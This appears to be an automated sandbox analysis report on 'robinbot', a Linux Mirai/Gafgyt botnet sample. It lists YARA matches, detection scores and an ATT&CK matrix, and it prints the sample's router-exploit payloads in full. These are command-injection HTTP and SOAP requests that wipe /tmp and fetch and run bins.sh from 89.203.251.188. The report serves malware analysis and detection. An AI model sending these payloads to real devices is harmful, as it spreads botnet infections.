Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: Initial sample	Potential command found: GET / HTTP/1.1
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcron
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.sh
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bins.sh;chmod+777+bins.sh;sh+bins.sh+b HTTP/1.1
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.203.251.188/bins.sh;sh${IFS}/tmp/bins.sh&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcronGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS};${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.shPOST /soap.cgi?service=WANIPConn1 HTTP/1.1

Source: robinbot	ELF static info symbol of initial sample: scanner.c
Source: robinbot	ELF static info symbol of initial sample: scanner10_pid
Source: robinbot	ELF static info symbol of initial sample: scanner11_pid
Source: robinbot	ELF static info symbol of initial sample: scanner12_pid
Source: robinbot	ELF static info symbol of initial sample: scanner13_pid
Source: robinbot	ELF static info symbol of initial sample: scanner2_pid
Source: robinbot	ELF static info symbol of initial sample: scanner3_pid
Source: robinbot	ELF static info symbol of initial sample: scanner4_pid
Source: robinbot	ELF static info symbol of initial sample: scanner5_pid
Source: robinbot	ELF static info symbol of initial sample: scanner6_pid
Source: robinbot	ELF static info symbol of initial sample: scanner7_pid
Source: robinbot	ELF static info symbol of initial sample: scanner8_pid
Source: robinbot	ELF static info symbol of initial sample: scanner9_pid
Source: robinbot	ELF static info symbol of initial sample: scanner_init
Source: robinbot	ELF static info symbol of initial sample: scanner_kill
Source: robinbot	ELF static info symbol of initial sample: scanner_pid
Source: robinbot	ELF static info symbol of initial sample: scanner_rawpkt

Source: Initial sample	String containing 'busybox' found: orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: consoleAtTCPBukkitJoinUDPStormMinecraftRandomNameRandomBytesMotdorf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: classification engine

Classification label: mal96.troj.evad.lin@0/2@0/0

Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/memset.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strchr.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strcspn.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strlen.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
Source: robinbot	ELF static info symbol of initial sample: libc/string/x86_64/strspn.S
Source: robinbot	ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
Source: robinbot	ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
Source: robinbot	ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
Source: robinbot	ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/robinbot (PID: 9446)

File: /tmp/robinbot

Jump to behavior

Source: /usr/share/apport/apport-gtk (PID: 9499)	Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 9532)	Queries kernel information via 'uname':

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: robinbot, type: SAMPLE
Source: Yara match	File source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: robinbot PID: 9446, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9449, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9451, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: robinbot, type: SAMPLE
Source: Yara match	File source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: robinbot PID: 9446, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9449, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: robinbot PID: 9451, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
robinbot	62%	ReversingLabs	Linux.Trojan.Mirai
robinbot	66%	Virustotal		Browse
robinbot	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://89.203.251.188/bins.sh;sh	100%	Avira URL Cloud	malware
http://89.203.251.188/mips	14%	Virustotal		Browse
http://89.203.251.188/mipsel	16%	Virustotal		Browse
http://89.203.251.188/bins.sh;$	100%	Avira URL Cloud	malware
http://89.203.251.188/bins.sh	16%	Virustotal		Browse
http://89.203.251.188/mips	100%	Avira URL Cloud	malware
http://89.203.251.188/mipsel	100%	Avira URL Cloud	malware
http://89.203.251.188/bins.sh;sh$	100%	Avira URL Cloud	malware
http://89.203.251.188/bins.sh;chmod	100%	Avira URL Cloud	malware
http://89.203.251.188/bins.sh	100%	Avira URL Cloud	malware
http://89.203.251.188/bin.sh;chmod	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://89.203.251.188/mipsel	robinbot	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://89.203.251.188/mips	robinbot	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://89.203.251.188/bins.sh	robinbot	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://89.203.251.188/bins.sh;sh	robinbot	false	Avira URL Cloud: malware	unknown
http://89.203.251.188/bins.sh;$	robinbot	false	Avira URL Cloud: malware	unknown
http://89.203.251.188/bins.sh;sh$	robinbot	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	robinbot	false		high
http://89.203.251.188/bins.sh;chmod	robinbot	false	Avira URL Cloud: malware	unknown
http://89.203.251.188/bin.sh;chmod	robinbot	false	Avira URL Cloud: malware	unknown
